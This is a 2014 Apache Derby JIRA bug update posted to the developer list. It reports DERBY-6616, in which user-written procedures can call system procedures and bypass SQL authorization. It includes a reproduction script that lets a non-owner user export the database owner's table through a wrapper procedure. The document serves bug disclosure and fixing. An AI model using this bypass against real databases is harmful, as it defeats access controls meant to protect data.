You are viewing a plain text version of this content. The canonical link for it is here.
Posted to derby-dev@db.apache.org by "Rick Hillegas (JIRA)" <ji...@apache.org> on 2014/06/17 15:37:02 UTC
[jira] [Updated] (DERBY-6616) User procedures can call system
procedures, circumventing SQL authorization.
[ https://issues.apache.org/jira/browse/DERBY-6616?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Rick Hillegas updated DERBY-6616:
---------------------------------
Attachment: SystemProcWrapper.java
Attaching SystemProcWrapper.java, which contains a procedure wrapping SYSCS_UTIL.SYSCS_EXPORT_TABLE. The following script shows how to use this procedure to circumvent SQL authorization checks on the system procedure:
{noformat}
connect 'jdbc:derby:memory:db1;create=true;user=test_dbo';
call syscs_util.syscs_create_user( 'TEST_DBO', 'test_dbopassword' );
call syscs_util.syscs_create_user( 'RUTH', 'ruthpassword' );
-- shutdown in order to enable NATIVE authentication
connect 'jdbc:derby:memory:db1;shutdown=true';
connect 'jdbc:derby:memory:db1;user=test_dbo;password=test_dbopassword' as dbo;
create table t( a int );
insert into t values ( 1 );
grant select on t to public;
connect 'jdbc:derby:memory:db1;user=ruth;password=ruthpassword' as ruth;
-- ruth can't execute this procedure directly
call syscs_util.syscs_export_table( 'TEST_DBO', 'T', 'z.dat', null, null, null );
create procedure wrapSYSCS_EXPORT_TABLE
(
in schemaname varchar(128),
in tablename varchar(128),
in filename varchar(32672),
in columndelimiter char(1),
in characterdelimiter char(1),
in codeset varchar(128)
)
language java parameter style java reads sql data
external name 'SystemProcWrapper.wrapSYSCS_EXPORT_TABLE';
-- but she can execute this wrapper procedure
call wrapSYSCS_EXPORT_TABLE( 'TEST_DBO', 'T', 'z.dat', null, null, null );
{noformat}
> User procedures can call system procedures, circumventing SQL authorization.
> ----------------------------------------------------------------------------
>
> Key: DERBY-6616
> URL: https://issues.apache.org/jira/browse/DERBY-6616
> Project: Derby
> Issue Type: Bug
> Components: SQL
> Affects Versions: 10.11.0.0
> Reporter: Rick Hillegas
> Attachments: SystemProcWrapper.java
>
>
> System procedures are implemented as public static methods in org.apache.derby.catalog.SystemProcedures. These methods can be called by code in user-written procedures. This allows a user-written procedure to circumvent the SQL authorization checks which are supposed to limit some procedures to being called only by the DBO. I will attach a repro.
--
This message was sent by Atlassian JIRA
(v6.2#6252)